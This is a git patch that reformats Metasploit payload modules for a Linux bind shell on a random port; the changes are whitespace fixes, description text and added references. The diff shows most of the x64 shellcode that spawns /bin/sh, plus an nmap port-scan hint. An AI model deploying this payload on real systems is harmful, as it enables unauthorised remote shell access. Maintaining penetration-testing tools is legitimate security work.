From 81a7b1a9bfc431a686278e6d1b780a3713f68ace Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Nov 2013 10:33:15 -0600 Subject: [PATCH] Fixes for #2350, random bind shellcode * Moved shortlink to a reference. * Reformat e-mail address. * Fixed whitespace * Use multiline quote per most other module descriptions Still need to resplat the modules, but it's no big thang to do that after landing. Also, References do not seem to appear for post modules in the normal msfconsole. This is a bug in the UI, not for these modules -- many payloads would benefit from being explicit on their references, so may as well start with these. --- external/source/shellcode/linux/ia32/Makefile | 18 ++++++++--------- .../linux/x64/shell_bind_tcp_random_port.rb | 20 ++++++++++--------- .../linux/x86/shell_bind_tcp_random_port.rb | 10 ++++++---- 3 files changed, 26 insertions(+), 22 deletions(-) diff --git a/external/source/shellcode/linux/ia32/Makefile b/external/source/shellcode/linux/ia32/Makefile index cadd2abf31..77f2294fdf 100644 --- a/external/source/shellcode/linux/ia32/Makefile +++ b/external/source/shellcode/linux/ia32/Makefile @@ -1,11 +1,11 @@ STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \ - stager_egghunt stager_sock_find stager_sock_reverse \ - stager_sock_reverse_icmp stager_sock_reverse_udp \ + stager_egghunt stager_sock_find stager_sock_reverse \ + stager_sock_reverse_icmp stager_sock_reverse_udp \ stager_sock_reverse_udp_dns STAGES=stage_tcp_shell stage_udp_shell SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \ - single_reverse_tcp_shell single_reverse_udp_shell single_exec \ - single_shell_bind_tcp_random_port + single_reverse_tcp_shell single_reverse_udp_shell single_exec \ + single_shell_bind_tcp_random_port OBJS=${STAGERS} ${STAGES} ${SINGLE} @@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS) @ruby -p -a -e ' \ $$F.shift; \ $$F[0].tap { |s| \ - s.tr! "A-F", "a-f"; \ - t=s.dup; \ - s.clear; \ - s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \ - STDIN.eof? ? s<< " # " : s<< "+# "; \ + s.tr! "A-F", "a-f"; \ + t=s.dup; \ + s.clear; \ + s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \ + STDIN.eof? ? s<< " # " : s<< "+# "; \ }; \ $$_ = $$F.join(" ") + "\n"; \ ' < $*.tmp > $@ diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index 50abba4dfe..87a48b423a 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -15,11 +15,13 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Random Port Inline', - 'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \ - 'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \ - 'Assembly source: http://goo.gl/TAveVc', - 'Author' => 'Geyslan G. Bem ', + 'Description' => %q{ + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + }, + 'Author' => 'Geyslan G. Bem ', 'License' => BSD_LICENSE, + 'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'], 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'Payload' => @@ -31,21 +33,21 @@ module Metasploit3 "\x6a\x02" +# pushq $0x2 "\x5f" +# pop %rdi "\xb0\x29" +# mov $0x29,%al - "\x0f\x05" +# syscall + "\x0f\x05" +# syscall "\x52" +# push %rdx "\x5e" +# pop %rsi "\x50" +# push %rax "\x5f" +# pop %rdi "\xb0\x32" +# mov $0x32,%al - "\x0f\x05" +# syscall + "\x0f\x05" +# syscall "\xb0\x2b" +# mov $0x2b,%al - "\x0f\x05" +# syscall + "\x0f\x05" +# syscall "\x57" +# push %rdi "\x5e" +# pop %rsi "\x48\x97" +# xchg %rax,%rdi "\xff\xce" +# dec %esi "\xb0\x21" +# mov $0x21,%al - "\x0f\x05" +# syscall + "\x0f\x05" +# syscall "\x75\xf8" +# jne 40009f "\x52" +# push %rdx "\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi @@ -54,7 +56,7 @@ module Metasploit3 "\x54" +# push %rsp "\x5f" +# pop %rdi "\xb0\x3b" +# mov $0x3b,%al - "\x0f\x05" # syscall + "\x0f\x05" # syscall } )) end diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index f46a5bb1a3..4a075f0dcf 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -15,11 +15,13 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Random Port Inline', - 'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \ - 'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \ - 'Assembly source: http://goo.gl/V5OObo', - 'Author' => 'Geyslan G. Bem ', + 'Description' => %q{ + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + }, + 'Author' => 'Geyslan G. Bem ', 'License' => BSD_LICENSE, + 'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Payload' =>